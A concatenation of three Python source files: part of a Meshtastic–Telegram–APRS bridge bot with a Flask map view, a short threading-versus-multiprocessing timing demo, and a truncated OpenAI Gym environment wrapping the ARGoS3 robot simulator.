raise RuntimeError('Tuple expected for latlon1')
if not isinstance(latlon2, tuple):
raise RuntimeError('Tuple expected for latlon2')
return haversine.haversine(latlon1, latlon2, unit=haversine.Unit.METERS)
def setup_logger(name=__name__, level=logging.INFO) -> logging.Logger:
"""
Set up logger and return usable instance
:param name:
:param level:
:return:
"""
logger = logging.getLogger(name)
logger.setLevel(level)
# create console handler and set level to debug
handler = logging.StreamHandler()
handler.setLevel(level)
# create formatter
formatter = logging.Formatter(LOGFORMAT)
# add formatter to ch
handler.setFormatter(formatter)
# add ch to logger
logger.addHandler(handler)
return logger
class Config:
"""
Config - two level configuration with functionality similar to dotted dict
"""
def __init__(self, config_path="mesh.ini"):
self.config_path = config_path
self.config = None
self.elements = []
def read(self):
"""
Read configuration file
:return:
"""
self.config = configparser.ConfigParser()
self.config.read(self.config_path)
@staticmethod
def enforce_type(value_type, value):
"""
Enforce selected type
:param value_type:
:param value:
:return:
"""
if value_type == bool:
if value.lower() == 'true':
return True
return False
return value_type(value)
def __getattr__(self, attr):
if self.config is None:
raise AttributeError('config is empty')
if len(self.elements) < 2:
self.elements.append(attr)
if len(self.elements) == 2:
result = self.config[self.elements[0]][self.elements[1]]
self.elements = []
return result
return self
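# Illustrative use of the dotted access implemented above (the section/option
# names come from mesh.ini and are read the same way in main() below):
#
#   config = Config()
#   config.read()
#   token = config.Telegram.Token                            # raw string value
#   debug = config.enforce_type(bool, config.DEFAULT.Debug)  # coerced to bool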
class TelegramConnection:
"""
Telegram connection
"""
def __init__(self, token: str, logger: logging.Logger):
self.logger = logger
self.updater = Updater(token=token, use_context=True)
def send_message(self, *args, **kwargs) -> None:
"""
Send Telegram message
:param args:
:param kwargs:
:return:
"""
self.updater.bot.send_message(*args, **kwargs)
def poll(self) -> None:
"""
Run Telegram bot polling
:return:
"""
self.updater.start_polling()
@property
def dispatcher(self) -> telegram.ext.Dispatcher:
"""
Return Telegram dispatcher for commands
:return:
"""
return self.updater.dispatcher
class MeshtasticConnection:
"""
Meshtastic device connection
"""
def __init__(self, dev_path: str, logger: logging.Logger):
self.dev_path = dev_path
self.interface = None
self.logger = logger
def connect(self):
"""
        Connect to the Meshtastic device. The interface can be updated later during the reboot procedure.
:return:
"""
self.interface = meshtastic_serial_interface.SerialInterface(devPath=self.dev_path, debugOut=sys.stdout)
def send_text(self, *args, **kwargs) -> None:
"""
Send Meshtastic message
:param args:
:param kwargs:
:return:
"""
self.interface.sendText(*args, **kwargs)
def node_info(self, node_id) -> Dict:
"""
Return node information for a specific node ID
:param node_id:
:return:
"""
return self.interface.nodes.get(node_id, {})
def reboot(self):
"""
Execute Meshtastic device reboot
:return:
"""
self.logger.info("Reboot requested...")
self.interface.getNode(MESHTASTIC_LOCAL_ADDR).reboot(10)
self.interface.close()
time.sleep(20)
self.connect()
self.logger.info("Reboot completed...")
@property
def nodes(self) -> Dict:
"""
Return dictionary of nodes
:return:
"""
return self.interface.nodes if self.interface.nodes else {}
@property
def nodes_with_info(self) -> List:
"""
Return list of nodes with information
:return:
"""
node_list = []
for node in self.nodes:
node_list.append(self.nodes.get(node))
return node_list
@property
def nodes_with_position(self) -> List:
"""
Filter out nodes without position
:return:
"""
node_list = []
for node_info in self.nodes_with_info:
if not node_info.get('position'):
continue
node_list.append(node_info)
return node_list
@property
def nodes_with_user(self) -> List:
"""
Filter out nodes without position or user
:return:
"""
node_list = []
for node_info in self.nodes_with_position:
if not node_info.get('user'):
continue
node_list.append(node_info)
return node_list
class MeshtasticNodeRecord(DB.Entity): # pylint:disable=too-few-public-methods
"""
MeshtasticNodeRecord: node record representation in DB
"""
nodeId = PrimaryKey(str)
nodeName = Required(str)
lastHeard = Required(datetime)
hwModel = Required(str)
locations = Set(lambda: MeshtasticLocationRecord)
messages = Set(lambda: MeshtasticMessageRecord)
class MeshtasticLocationRecord(DB.Entity): # pylint:disable=too-few-public-methods
"""
MeshtasticLocationRecord: location record representation in DB
"""
datetime = Required(datetime)
altitude = Required(float)
batteryLevel = Required(float)
latitude = Required(float)
longitude = Required(float)
rxSnr = Required(float)
node = Optional(MeshtasticNodeRecord)
class MeshtasticMessageRecord(DB.Entity): # pylint:disable=too-few-public-methods
"""
MeshtasticMessageRecord: message record representation in DB
"""
datetime = Required(datetime)
message = Required(str)
node = Optional(MeshtasticNodeRecord)
class MeshtasticFilterRecord(DB.Entity):
"""
MeshtasticFilterRecord: filter representation in DB
"""
# meshtastic, telegram, etc...
connection = Required(str)
item = Required(str)
reason = Required(str)
active = Required(bool)
class MeshtasticDB:
"""
Meshtastic events database
"""
def __init__(self, db_file: AnyStr, connection: MeshtasticConnection, logger: logging.Logger):
self.connection = connection
self.logger = logger
DB.bind(provider='sqlite', filename=db_file, create_db=True)
DB.generate_mapping(create_tables=True)
@db_session
def get_node_record(self, node_id: AnyStr) -> MeshtasticNodeRecord:
"""
Retrieve node record from DB
:param node_id:
:return:
"""
node_record = MeshtasticNodeRecord.select(lambda n: n.nodeId == node_id).first()
node_info = self.connection.node_info(node_id)
last_heard = datetime.fromtimestamp(node_info.get('lastHeard', 0))
if not node_record:
# create new record
node_record = MeshtasticNodeRecord(
nodeId=node_id,
nodeName=node_info.get('user', {}).get('longName', ''),
lastHeard=last_heard,
hwModel=node_info.get('user', {}).get('hwModel', ''),
)
return node_record
# Update lastHeard and return record
node_record.lastHeard = last_heard # pylint:disable=invalid-name
return node_record
@staticmethod
@db_session
def get_stats(node_id: AnyStr) -> AnyStr:
"""
Get node stats
:param node_id:
:return:
"""
node_record = MeshtasticNodeRecord.select(lambda n: n.nodeId == node_id).first()
return f"Locations: {len(node_record.locations)}. Messages: {len(node_record.messages)}"
@db_session
def store_message(self, packet: dict) -> None:
"""
Store Meshtastic message in DB
:param packet:
:return:
"""
from_id = packet.get("fromId")
node_record = self.get_node_record(from_id)
decoded = packet.get('decoded')
message = decoded.get('text', '')
# Save meshtastic message
MeshtasticMessageRecord(
datetime=datetime.fromtimestamp(time.time()),
message=message,
node=node_record,
)
@db_session
def store_location(self, packet: dict) -> None:
"""
Store Meshtastic location in DB
:param packet:
:return:
"""
from_id = packet.get("fromId")
node_record = self.get_node_record(from_id)
# Save location
position = packet.get('decoded', {}).get('position', {})
# add location to DB
MeshtasticLocationRecord(
datetime=datetime.fromtimestamp(time.time()),
altitude=position.get('altitude', 0),
batteryLevel=position.get('batteryLevel', 100),
latitude=position.get('latitude', 0),
longitude=position.get('longitude', 0),
rxSnr=packet.get('rxSnr', 0),
node=node_record,
)
class Filter:
"""
Filter parent class
"""
connection_type = ""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
self.database = database
self.connection = connection
self.config = config
self.logger = logger
class TelegramFilter(Filter):
"""
Telegram users filter
"""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
super().__init__(database, config, connection, logger)
self.database = database
self.config = config
self.connection = connection
self.connection_type = "Telegram"
self.logger = logger
class MeshtasticFilter(Filter):
"""
Meshtastic users filter
"""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
super().__init__(database, config, connection, logger)
self.database = database
self.config = config
self.connection = connection
self.connection_type = "Meshtastic"
self.logger = logger
class CallSignFilter(Filter):
"""
APRS callsign filter
"""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
super().__init__(database, config, connection, logger)
self.database = database
self.config = config
self.connection = connection
self.connection_type = "Callsign"
self.logger = logger
class APRSStreamer:
"""
APRS streamer
"""
def __init__(self, config: Config):
self.aprs_is = None
self.filter = None
self.config = config
self.logger = None
self.exit = False
def set_logger(self, logger: logging.Logger):
"""
Set class logger
:param logger:
:return:
"""
self.logger = logger
def set_filter(self, filter_class: CallSignFilter):
"""
Set APRS callsign filter class
:param filter_class:
:return:
"""
self.filter = filter_class
def send_packet(self, packet):
"""
Send APRS packet
:param packet:
:return:
"""
if not self.config.enforce_type(bool, self.config.APRS.FromMeshtastic):
return
self.aprs_is.sendall(packet)
def process(self, packet):
"""
Process APRS packet
:param packet:
:return:
"""
if not self.config.enforce_type(bool, self.config.APRS.ToMeshtastic):
return
self.logger.debug(packet)
@staticmethod
def callback(packet):
"""
APRS packet callback
:param packet:
:return:
"""
pub.sendMessage('APRS', packet=packet)
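        # The raw APRS packet is re-published on the internal 'APRS' pubsub topic;
        # run() below subscribes self.process to that topic when APRS is enabled.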
def run_loop(self):
"""
APRS streamer loop
:return:
"""
self.aprs_is = aprslib.IS(self.config.APRS.Callsign,
self.config.APRS.Password,
host='euro.aprs2.net',
port=14580)
f_filter = f"r/{self.config.enforce_type(float, self.config.WebApp.Center_Latitude)}/"
f_filter += f"{self.config.enforce_type(float, self.config.WebApp.Center_Longitude)}/50"
self.aprs_is.set_filter(f_filter)
#
while not self.exit:
try:
self.aprs_is.connect()
self.aprs_is.consumer(self.callback, immortal=True)
except KeyboardInterrupt:
break
except aprslib.exceptions.ConnectionDrop:
self.logger.debug("aprs conn drop")
except aprslib.exceptions.LoginError:
self.logger.debug("aprs login error")
def run(self):
"""
APRS runner
:return:
"""
if self.config.enforce_type(bool, self.config.APRS.Enabled):
pub.subscribe(self.process, 'APRS')
thread = Thread(target=self.run_loop, daemon=True)
thread.start()
class TelegramBot:
"""
Telegram bot
"""
def __init__(self, config: Config, meshtastic_connection: MeshtasticConnection,
telegram_connection: TelegramConnection):
self.config = config
self.filter = None
self.logger = None
self.meshtastic_connection = meshtastic_connection
self.telegram_connection = telegram_connection
start_handler = CommandHandler('start', self.start)
node_handler = CommandHandler('nodes', self.nodes)
reboot_handler = CommandHandler('reboot', self.reboot)
dispatcher = self.telegram_connection.dispatcher
dispatcher.add_handler(start_handler)
dispatcher.add_handler(node_handler)
dispatcher.add_handler(reboot_handler)
echo_handler = MessageHandler(Filters.text & (~Filters.command), self.echo)
dispatcher.add_handler(echo_handler)
def set_logger(self, logger: logging.Logger):
"""
Set class logger
:param logger:
:return:
"""
self.logger = logger
def set_filter(self, filter_class: TelegramFilter):
"""
Set filter class
:param filter_class:
:return:
"""
self.filter = filter_class
def echo(self, update: Update, _) -> None:
"""
Telegram bot echo handler. Does actual message forwarding
:param update:
:param _:
:return:
"""
if update.effective_chat.id != self.config.enforce_type(int, self.config.Telegram.Room):
self.logger.debug("%d %s",
update.effective_chat.id,
self.config.enforce_type(int, self.config.Telegram.Room))
return
full_user = update.effective_user.first_name
if update.effective_user.last_name is not None:
full_user += ' ' + update.effective_user.last_name
self.logger.debug(f"{update.effective_chat.id} {full_user} {update.message.text}")
self.meshtastic_connection.send_text(f"{full_user}: {update.message.text}")
def poll(self) -> None:
"""
Telegram bot poller. Uses connection under the hood
:return:
"""
self.telegram_connection.poll()
@staticmethod
def start(update: Update, context: CallbackContext) -> None:
"""
Telegram /start command handler.
:param update:
:param context:
:return:
"""
context.bot.send_message(chat_id=update.effective_chat.id, text="I'm a bot, please talk to me!")
def reboot(self, update: Update, context: CallbackContext) -> None:
"""
Telegram reboot command
:param update:
:param context:
:return:
"""
if update.effective_chat.id != self.config.enforce_type(int, self.config.Telegram.Admin):
self.logger.info("Reboot requested by non-admin: %d", update.effective_chat.id)
return
context.bot.send_message(chat_id=update.effective_chat.id, text="Requesting reboot...")
self.meshtastic_connection.reboot()
def nodes(self, update: Update, context: CallbackContext) -> None:
"""
Returns list of nodes to user
:param update:
:param context:
:return:
"""
table = self.meshtastic_connection.interface.showNodes(includeSelf=False)
context.bot.send_message(chat_id=update.effective_chat.id, text=table)
def run(self):
"""
Telegram bot runner
:return:
"""
thread = Thread(target=self.poll)
thread.start()
class MeshtasticBot:
"""
Meshtastic bot
"""
def __init__(self, database: MeshtasticDB, config: Config, meshtastic_connection: MeshtasticConnection,
telegram_connection: TelegramConnection):
self.database = database
self.config = config
self.filter = None
self.logger = None
self.telegram_connection = telegram_connection
self.meshtastic_connection = meshtastic_connection
# track ping request/reply
self.ping_container = {}
def set_logger(self, logger: logging.Logger):
"""
Set class logger
:param logger:
:return:
"""
self.logger = logger
def set_filter(self, filter_class: MeshtasticFilter):
"""
Set filter class
:param filter_class:
:return:
"""
self.filter = filter_class
def on_connection(self, interface, topic=pub.AUTO_TOPIC):
"""
on radio connection event
:param interface:
:param topic:
:return:
"""
self.logger.debug("connection on %s topic %s", interface, topic)
def on_node_info(self, node, interface):
"""
on node information event
:param node:
:param interface:
:return:
"""
self.logger.debug("node info %s on interface %s", node, interface)
def subscribe(self) -> None:
"""
Subscribe to Meshtastic events
:return:
"""
pub.subscribe(self.on_receive, "meshtastic.receive")
pub.subscribe(self.on_connection, "meshtastic.connection.established")
pub.subscribe(self.on_connection, "meshtastic.connection.lost")
@staticmethod
def process_distance_command(packet, interface) -> None: # pylint:disable=too-many-locals
"""
Process /distance Meshtastic command
:param packet:
:param interface:
:return:
"""
from_id = packet.get('fromId')
mynode_info = interface.nodes.get(from_id)
if not mynode_info:
interface.sendText("distance err: no node info", destinationId=from_id)
return
position = mynode_info.get('position', {})
if not position:
interface.sendText("distance err: no position", destinationId=from_id)
return
my_latitude = position.get('latitude')
my_longitude = position.get('longitude')
if not (my_latitude and my_longitude):
interface.sendText("distance err: no lat/lon", destinationId=from_id)
return
for node in interface.nodes:
node_info = interface.nodes.get(node)
position = node_info.get('position', {})
if not position:
continue
latitude = position.get('latitude')
longitude = position.get('longitude')
if not (latitude and longitude):
continue
user = node_info.get('user', {})
if not user:
continue
node_id = user.get('id', '')
if from_id == node_id:
continue
long_name = user.get('longName', '')
distance = round(get_lat_lon_distance((my_latitude, my_longitude), (latitude, longitude)))
distance = humanize.intcomma(distance)
msg = f"{long_name}: {distance}m"
interface.sendText(msg, destinationId=from_id)
def process_ping_command(self, packet, interface) -> None:
"""
Process /ping Meshtastic command
:param packet:
:param interface:
:return:
"""
from_id = packet.get('fromId')
self.ping_container[from_id] = {'timestamp': time.time()}
payload = str.encode("test string")
interface.sendData(payload,
MESHTASTIC_BROADCAST_ADDR,
portNum=meshtastic_portnums_pb2.PortNum.REPLY_APP,
wantAck=True, wantResponse=True)
def process_stats_command(self, packet, _) -> None:
"""
Process /stats Meshtastic command
:param packet:
:param _:
:return:
"""
from_id = packet.get('fromId')
msg = self.database.get_stats(from_id)
self.meshtastic_connection.send_text(msg, destinationId=from_id)
def process_meshtastic_command(self, packet, interface) -> None:
"""
Process Meshtastic command
:param packet:
:param interface:
:return:
"""
decoded = packet.get('decoded')
from_id = packet.get('fromId')
msg = decoded.get('text', '')
if msg.startswith('/distance'):
self.process_distance_command(packet, interface)
return
if msg.startswith('/ping'):
self.process_ping_command(packet, interface)
return
if msg.startswith('/stats'):
self.process_stats_command(packet, interface)
return
if msg.startswith('/reboot') and from_id == self.config.Meshtastic.Admin:
self.meshtastic_connection.reboot()
return
self.meshtastic_connection.send_text("unknown command", destinationId=from_id)
def process_pong(self, packet):
"""
:param packet:
:return:
"""
from_id = packet.get('fromId')
to_id = packet.get('toId')
rx_time = packet.get('rxTime', 0)
rx_snr = packet.get('rxSnr', 0)
processing_time = time.time() - rx_time
# node info
node_info = self.meshtastic_connection.node_info(to_id)
user_info = node_info.get('user', {})
remote_name = user_info.get('longName', to_id)
#
if self.ping_container.get(from_id, {}):
timestamp = self.ping_container[from_id].get('timestamp', 0)
processing_time += time.time() - timestamp
msg = f"Pong from {remote_name} at {rx_snr:.2f} SNR time={processing_time:.3f}s"
self.meshtastic_connection.send_text(msg, destinationId=from_id)
def on_receive(self, packet, interface) -> None:
"""
onReceive is called when a packet arrives
:param packet:
:param interface:
:return:
"""
self.logger.debug(f"Received: {packet}")
to_id = packet.get('toId')
decoded = packet.get('decoded')
from_id = packet.get('fromId')
if decoded.get('portnum') != 'TEXT_MESSAGE_APP':
# notifications
if decoded.get('portnum') == 'POSITION_APP':
self.database.store_location(packet)
return
# pong
if decoded.get('portnum') == 'REPLY_APP':
self.process_pong(packet)
return
# updater.bot.send_message(chat_id=MESHTASTIC_ADMIN, text="%s" % decoded)
# self.logger.debug(decoded)
return
# ignore non-broadcast messages
if to_id != MESHTASTIC_BROADCAST_ADDR:
return
# Save messages
self.database.store_message(packet)
# Process commands and forward messages
node_info = interface.nodes.get(from_id)
long_name = from_id
if node_info is not None:
user_info = node_info.get('user')
long_name = user_info.get('longName')
msg = decoded.get('text', '')
# skip commands
if msg.startswith('/'):
self.process_meshtastic_command(packet, interface)
return
self.telegram_connection.send_message(chat_id=self.config.enforce_type(int, self.config.Telegram.Room),
text=f"{long_name}: {msg}")
class RenderTemplateView(View):
"""
Generic HTML template renderer
"""
def __init__(self, template_name):
self.template_name = template_name
def dispatch_request(self) -> AnyStr:
"""
Process Flask request
:return:
"""
return render_template(self.template_name, timestamp=int(time.time()))
class RenderScript(View):
"""
Specific script renderer
"""
def __init__(self, config: Config):
self.config = config
def dispatch_request(self) -> flask.Response:
"""
Process Flask request
:return:
"""
response = make_response(render_template(
"script.js",
api_key=self.config.WebApp.APIKey,
redraw_markers_every=self.config.WebApp.RedrawMarkersEvery,
center_latitude=self.config.enforce_type(float, self.config.WebApp.Center_Latitude),
center_longitude=self.config.enforce_type(float, self.config.WebApp.Center_Longitude),
))
response.headers['Content-Type'] = 'application/javascript'
return response
class RenderDataView(View):
"""
Specific data renderer
"""
def __init__(self, config: Config, meshtastic_connection: MeshtasticConnection, logger: logging.Logger):
self.config = config
self.logger = logger
self.meshtastic_connection = meshtastic_connection
@staticmethod
def format_hw(hw_model: AnyStr) -> AnyStr:
"""
Format hardware model
:param hw_model:
:return:
"""
if hw_model == 'TBEAM':
return '<a href="https://meshtastic.org/docs/hardware/supported/tbeam">TBEAM</a>'
if hw_model.startswith('TLORA'):
return '<a href="https://meshtastic.org/docs/hardware/supported/lora">TLORA</a>'
return hw_model
def dispatch_request(self) -> flask.Response: # pylint:disable=too-many-locals
"""
Process Flask request
:return:
"""
query_string = parse_qs(request.query_string)
tail_value = self.config.enforce_type(int, self.config.WebApp.LastHeardDefault)
#
tail = query_string.get(b'tail', [])
if len(tail) > 0:
try:
tail_value = int(tail[0].decode())
except ValueError:
self.logger.error("Wrong tail value: ", tail)
#
name = ''
name_qs = query_string.get(b'name', [])
if len(name_qs) > 0:
name = name_qs[0].decode()
nodes = []
for node_info in self.meshtastic_connection.nodes_with_user:
position = node_info.get('position', {})
latitude = position.get('latitude')
longitude = position.get('longitude')
if not (latitude and longitude):
continue
user = node_info.get('user', {})
hw_model = user.get('hwModel', 'unknown')
snr = node_info.get('snr', 10.0)
# No signal info, use default MAX (10.0)
if snr is None:
snr = 10.0
last_heard = int(node_info.get('lastHeard', 0))
last_heard_dt = datetime.fromtimestamp(last_heard)
battery_level = position.get('batteryLevel', 100)
altitude = position.get('altitude', 0)
# tail filter
diff = datetime.fromtimestamp(time.time()) - last_heard_dt
if diff > timedelta(seconds=tail_value):
continue
# name filter
if len(name) > 0 and user.get('longName') != name:
continue
#
nodes.append([user.get('longName'), str(round(latitude, 5)),
str(round(longitude, 5)), self.format_hw(hw_model), snr,
last_heard_dt.strftime("%d/%m/%Y, %H:%M:%S"),
battery_level,
altitude,
])
return jsonify(nodes)
class WebApp: # pylint:disable=too-few-public-methods
"""
WebApp: web application container
"""
def __init__(self, app: Flask, config: Config, meshtastic_connection: MeshtasticConnection, logger: logging.Logger):
self.app = app
self.config = config
self.logger = logger
self.meshtastic_connection = meshtastic_connection
def register(self) -> None:
"""
Register Flask routes
:return:
"""
self.app.add_url_rule('/script.js', view_func=RenderScript.as_view(
'script_page', config=self.config))
self.app.add_url_rule('/data.json', view_func=RenderDataView.as_view(
'data_page', config=self.config, meshtastic_connection=self.meshtastic_connection, logger=self.logger))
# Index pages
self.app.add_url_rule('/', view_func=RenderTemplateView.as_view(
'root_page', template_name='index.html'))
self.app.add_url_rule('/index.htm', view_func=RenderTemplateView.as_view(
'index_page', template_name='index.html'))
self.app.add_url_rule('/index.html', view_func=RenderTemplateView.as_view(
'index_html_page', template_name='index.html'))
class ServerThread(Thread):
"""
Web application server thread
"""
def __init__(self, app: Flask, config: Config, logger: logging.Logger):
Thread.__init__(self)
self.config = config
self.logger = logger
self.server = make_server('', self.config.enforce_type(int, self.config.WebApp.Port), app)
self.ctx = app.app_context()
self.ctx.push()
def run(self) -> None:
"""
:return:
"""
self.logger.info('starting server')
self.server.serve_forever()
def shutdown(self) -> None:
"""
:return:
"""
self.server.shutdown()
class WebServer: # pylint:disable=too-few-public-methods
"""
Web server wrapper around Flask app
"""
def __init__(self, config: Config, meshtastic_connection: MeshtasticConnection, logger: logging.Logger):
self.meshtastic_connection = meshtastic_connection
self.config = config
self.logger = logger
self.app = Flask(__name__)
self.server = None
def run(self) -> None:
"""
Run web server
:return:
"""
if self.config.enforce_type(bool, self.config.WebApp.Enabled):
web_app = WebApp(self.app, self.config, self.meshtastic_connection, self.logger)
web_app.register()
self.server = ServerThread(self.app, self.config, self.logger)
self.server.start()
def shutdown(self) -> None:
"""
Web server shutdown method
:return:
"""
self.server.shutdown()
def main():
"""
Main function :)
:return:
"""
config = Config()
config.read()
level = logging.INFO
if config.enforce_type(bool, config.DEFAULT.Debug):
level = logging.DEBUG
set_sql_debug(True)
# our logger
logger = setup_logger('mesh', level)
# meshtastic logger
logging.basicConfig(level=level,
format=LOGFORMAT)
#
telegram_connection = TelegramConnection(config.Telegram.Token, logger)
meshtastic_connection = MeshtasticConnection(config.Meshtastic.Device, logger)
meshtastic_connection.connect()
database = MeshtasticDB(config.Meshtastic.DatabaseFile, meshtastic_connection, logger)
#
aprs_streamer = APRSStreamer(config)
call_sign_filter = CallSignFilter(database, config, meshtastic_connection, logger)
aprs_streamer.set_filter(call_sign_filter)
aprs_streamer.set_logger(logger)
#
telegram_bot = TelegramBot(config, meshtastic_connection, telegram_connection)
telegram_filter = TelegramFilter(database, config, meshtastic_connection, logger)
telegram_bot.set_filter(telegram_filter)
telegram_bot.set_logger(logger)
#
meshtastic_bot = MeshtasticBot(database, config, meshtastic_connection, telegram_connection)
meshtastic_filter = MeshtasticFilter(database, config, meshtastic_connection, logger)
meshtastic_bot.set_filter(meshtastic_filter)
meshtastic_bot.set_logger(logger)
meshtastic_bot.subscribe()
#
web_server = WebServer(config, meshtastic_connection, logger)
# non-blocking
aprs_streamer.run()
web_server.run()
telegram_bot.run()
# blocking
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
web_server.shutdown()
logger.info('Exit requested...')
sys.exit(0)
if __name__ == '__main__':
main()
|
main.py
|
"""An of multithreading vs multiprocessing.
Adapted from https://code.tutsplus.com/articles/introduction-to-parallel-and-concurrent-programming-in-python--cms-28612
"""
import os
import time
import threading
from multiprocessing import Pool
NUM_WORKERS = 4
def non_blocking_fct(_):
"""Execute a non-blocking action.
A non-blocking action is something that doesn't require Python's attention
and can execute in the background.
"""
time.sleep(1)
def blocking_fct(_):
"""Execute a blocking action.
A blocking action is something that requires Python's attention.
"""
x = 0
while x < 10000000:
x += 1
if __name__ == '__main__':
print("Execution of non-blocking tasks")
# Run tasks serially
start_time = time.time()
for _ in range(NUM_WORKERS):
non_blocking_fct(_)
end_time = time.time()
print("Serial time={}".format(end_time - start_time))
# Run tasks using threads
start_time = time.time()
threads = [threading.Thread(target=non_blocking_fct, args=(_,)) for _ in range(NUM_WORKERS)]
[thread.start() for thread in threads]
[thread.join() for thread in threads] # Wait for everything to finish
end_time = time.time()
print("Threading time={}".format(end_time - start_time))
# Run tasks using processes
start_time = time.time()
    pool = Pool(processes=NUM_WORKERS)
    pool.map(non_blocking_fct, range(NUM_WORKERS))
end_time = time.time()
print("multiprocessing time={}".format(end_time - start_time))
print("")
print("Execution of blocking tasks")
start_time = time.time()
for _ in range(NUM_WORKERS):
blocking_fct(_)
end_time = time.time()
print("Serial time={}".format(end_time - start_time))
start_time = time.time()
threads = [threading.Thread(target=blocking_fct, args=(_,)) for _ in range(NUM_WORKERS)]
[thread.start() for thread in threads]
[thread.join() for thread in threads] # Wait for everything to finish
end_time = time.time()
print("Threading time={}".format(end_time - start_time))
start_time = time.time()
    pool = Pool(processes=NUM_WORKERS)
    pool.map(blocking_fct, range(NUM_WORKERS))
end_time = time.time()
print("multiprocessing time={}".format(end_time - start_time))
"""
Typical output:
Execution of non-blocking tasks
Serial time=4.01600003242
Threading time=1.0150001049
Multiprocessing time=1.10500001907
Execution of blocking tasks
Serial time=1.40599989891
Threading time=5.13499999046
Multiprocessing time=0.421999931335
Analysis:
For non-blocking tasks, threading and multiprocessing give similar results,
since all the waiting can be handled in the background. Multiprocessing does
perform a bit worse since there is overhead associated with spawning
additional processes. Both still run much faster than serial execution, though.
For blocking tasks, threading performs even worse than serial execution, because
the GIL forces Python to jump back and forth between threads, which slows down the execution.
Multiprocessing, however, cuts down the time significantly.
"""
|
argos3_env.py
|
import threading
import socket
import subprocess
import os
import json
import sys
import platform
import shutil
import resource
import psutil
import sh
from time import sleep
import numpy as np
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import logging
logger = logging.getLogger('Argos3Env')
class Argos3Env(gym.Env):
"""A base class for environments using ARGoS3
Implements the gym.Env interface. See
https://gym.openai.com/docs
and
https://github.com/openai/gym/tree/master/gym/envs#how-to-create-new-environments-for-gym
Based on the UnityEnv class in the rl-unity repo (see github).
"""
metadata = {'render.modes': ['human']}
def __init__(self, width, height):
""" Initializes everything.
"""
self.proc = None
self.soc = None
self.connected = False
self.width = width
self.height = height
self.log_argos3 = False
self.logfile = None
self.restart = False
def setParams(self, number, min_speed, max_speed, data_type):
self.robots_num = number
self.action_dim = number
self.state_dim = number*(1+24*2+1)
self.frame_dim = 2000000000
if data_type is "numerical":
self.buffer_size = self.state_dim * 4
else:
self.buffer_size = self.frame_dim + self.state_dim
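        # buffer_size is the number of bytes expected from the simulator per step:
        # 4 bytes per float32 state value, or the raw frame bytes plus the state.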
self.action_space = spaces.Box(
min_speed * np.ones(self.action_dim),
max_speed * np.ones(self.action_dim))
        self.data_type = data_type
def conf(self, loglevel='INFO', log_argos3=False, logfile=None, *args, **kwargs):
""" Configures the logger.
"""
logger.setLevel(getattr(logging, loglevel.upper()))
self.log_argos3 = log_argos3
if logfile:
self.logfile = open(logfile, 'w')
def connect(self):
""" Connects to localhost, displays the path
to the simulator binary.
"""
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = get_free_port(host)
logger.debug('Port: {}'.format(port))
assert port != 0
logger.debug(f"Platform {platform.platform()}")
pl = 'unix'
bin = sh.which('argos3')
env = os.environ.copy()
env.update(ARGOS_PORT=str(port))
env.update(DATA=self.data_type)
logger.debug(f'Simulator binary {bin}')
def stdw():
""" Takes whatever the subprocess is emiting
and pushes it to the standard output.
"""
for c in iter(lambda: self.proc.stdout.read(1), ''):
sys.stdout.write(c)
sys.stdout.flush()
def memory_usage(pid):
proc = psutil.Process(pid)
mem = proc.memory_info().rss #resident memory
for child in proc.children(recursive=True):
try:
mem += child.memory_info().rss
except psutil.NoSuchProcess:
pass
return mem
def poll():
""" Limits the memory used by the subprocess.
"""
            while self.proc.poll() is None:
limit = 3
if memory_usage(self.proc.pid) > limit * 1024**3:
logger.warning(f'Memory usage above {limit}gb. Restarting after this episode.')
self.restart = True
sleep(5)
            logger.debug(f'Simulator returned with {self.proc.returncode}')
config_dir = os.path.expanduser('~/.config/argos3/plow-argos3') # which means that's where you have to put the config files
if os.path.isdir(config_dir):
shutil.rmtree(config_dir, ignore_errors=True)
        def limit():
            """ Limits resources used by the simulator subprocess.
            Only limits the address space by default.
            """
            l = 6 * 1024**3  # 6 GiB of address space; was enough for Unity, so should be more than enough here
            try:
                # set whatever additional limits you want in this block
                resource.setrlimit(resource.RLIMIT_AS, (l, l))
            except Exception as e:
                print(e)
                raise
"""The following configures stderr, launches a subprocess,
begins a thread and establishes a connection to the simulator.
"""
stderr = self.logfile if self.logfile else (subprocess.PIPE if self.log_argos3 else subprocess.DEVNULL)
self.proc = subprocess.Popen([bin, '-c', 'plow-argos3/argos/crossroad-fb.argos', '-e', './ddpg.log'],
env=env,
stdout=stderr,
universal_newlines=True,
preexec_fn=limit)
threading.Thread(target=poll, daemon=True).start()
#threading.Thread(target=stdw, daemon=True).start()
# wait until connection with simulator process
timeout = 20
for i in range(timeout * 10):
            if self.proc.poll() is not None:
logger.debug('simulator died')
break
try:
self.soc.connect((host, port))
self.soc.settimeout(20*60) # 20 minutes
self.connected = True
logger.debug('finally connected')
break
except ConnectionRefusedError as e:
if i == timeout * 10 - 1:
print(e)
sleep(.1)
if not self.connected:
raise ConnectionRefusedError('Connection with simulator could not be established.')
def _reset(self):
if self.restart:
self.disconnect()
self.restart = False
if not self.connected:
self.connect()
state, frame = self.receive()
return state, frame
def receive(self):
""" Receive data from simulator process.
"""
data_in = b""
        while len(data_in) < self.buffer_size:
            chunk = self.soc.recv(min(1024, self.buffer_size - len(data_in)))
            if not chunk:
                raise ConnectionError('Socket closed before a full message was received')
            data_in += chunk
# if not looking at frames
if self.data_type is "numerical":
state = np.frombuffer(data_in, np.float32, self.state_dim, 0)
frame = None
else:
# convert frame pixels to numpy array
# 80x80 frame (6400 pixels)
bytes_per_line = 80
byte_number = bytes_per_line**2
frame = np.frombuffer(data_in, np.uint8, byte_number, 0)
            bytes_per_col = byte_number // bytes_per_line  # integer division; np.reshape needs int dimensions
            frame = np.reshape(frame, [bytes_per_line, bytes_per_col])
            frame = frame[::-1, :]  # flip vertically; single-channel frame, so no colour slice
state = None
logger.debug("Frame received")
self.last_state = state
self.last_frame = frame
return state, frame
def send(self, action, reset=False):
""" Send action to execute through socket.
"""
a = np.concatenate((action, [1. if reset else 0.]))
a = np.array(a, dtype=np.float32)
assert a.shape == (self.action_dim + 1,)
data_out = a.tobytes()
